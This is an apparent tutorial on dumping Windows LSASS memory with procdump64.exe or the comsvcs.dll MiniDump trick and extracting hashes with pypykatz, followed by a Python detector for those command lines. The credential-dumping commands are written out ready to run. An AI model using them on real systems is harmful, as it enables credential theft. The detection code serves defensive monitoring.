You don't need mimikatz. You can dump hashes from LSASS by abusing the LSASS process to generate an lsass.dmp file. After that, we will use pypykatz to extract the hashes from the lsass.dmp file.
First, we must have administrative privileges to carry out this attack. Upload procdump64.exe to the target machine.
powershell.exe -ep bypass
get-process lsass
In our case, 596 is the lsass process ID. Pass it to procdump64.exe to generate a file containing the hashes.
.\procdump64.exe -accepteula -ma 596 lsass.dmp
We can also use native DLLs instead of procdump64.exe; this way we don't have to upload anything to the target machine.
C:\\Windows\\System32\\rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump 596 C:\\Users\\Bob\\Desktop\\lsass.dmp full
After downloading the lsass.dmp file to our attacking machine, we can extract the hashes using pypykatz.
pypykatz lsa minidump lsass.dmp
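
Both dump methods above leave a recognizable process command line on the target. The following is an added example, not part of the original post: a Python check over constructed process-creation command lines that flags the procdump64.exe and comsvcs.dll MiniDump invocations shown above. The function names, labels and sample lines are assumptions made for illustration, and the lsass PID is assumed to be known from the same telemetry.

```python
import re

# Constructed sample process-creation command lines (not real telemetry).
SAMPLE_EVENTS = [
    r".\procdump64.exe -accepteula -ma 596 lsass.dmp",
    r"C:\\Windows\\System32\\rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump 596 C:\\Users\\Bob\\Desktop\\lsass.dmp full",
    r"C:\Tools\procdump64.exe -accepteula -ma 4312 app.dmp",
    r"C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL",
    r"powershell.exe -ep bypass",
]

PROCDUMP = re.compile(r"(?:^|[\\/\s\"])procdump(?:64)?(?:\.exe)?\b", re.I)
FULL_DUMP_FLAG = re.compile(r"(?:^|\s)[-/]ma\b", re.I)
COMSVCS_MINIDUMP = re.compile(r"\bcomsvcs(?:\.dll)?\b.*\bminidump\b", re.I)


def classify(cmdline, lsass_pid):
    """Return a finding label for a command line, or None if nothing matches.

    lsass_pid is the PID of lsass.exe on the host that logged the event
    (assumption: available from the same telemetry source).
    """
    # Collapse doubled backslashes and case so path spelling does not matter.
    norm = re.sub(r"\\+", r"\\", cmdline).lower()
    tokens = re.split(r"[\s,]+", norm)
    # The dump target is given as a PID or as the process name.
    targets_lsass = str(lsass_pid) in tokens or any(
        t.strip('"') in ("lsass", "lsass.exe") for t in tokens)
    if COMSVCS_MINIDUMP.search(norm):
        # MiniDump via comsvcs.dll is rare in normal operation; rate by target.
        return "comsvcs-minidump-lsass" if targets_lsass else "comsvcs-minidump"
    if PROCDUMP.search(norm) and FULL_DUMP_FLAG.search(norm) and targets_lsass:
        return "procdump-lsass"
    return None  # e.g. procdump taking a full dump of an unrelated process


def scan(events, lsass_pid):
    """Return (label, cmdline) for every flagged event."""
    return [(label, e) for e in events if (label := classify(e, lsass_pid))]


if __name__ == "__main__":
    for label, cmd in scan(SAMPLE_EVENTS, lsass_pid=596):
        print(f"{label}: {cmd}")
```

Command-line matching covers only the two invocations as they appear on this page; it is a starting point for an alert rule, to be paired with monitoring of process access to lsass.exe.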


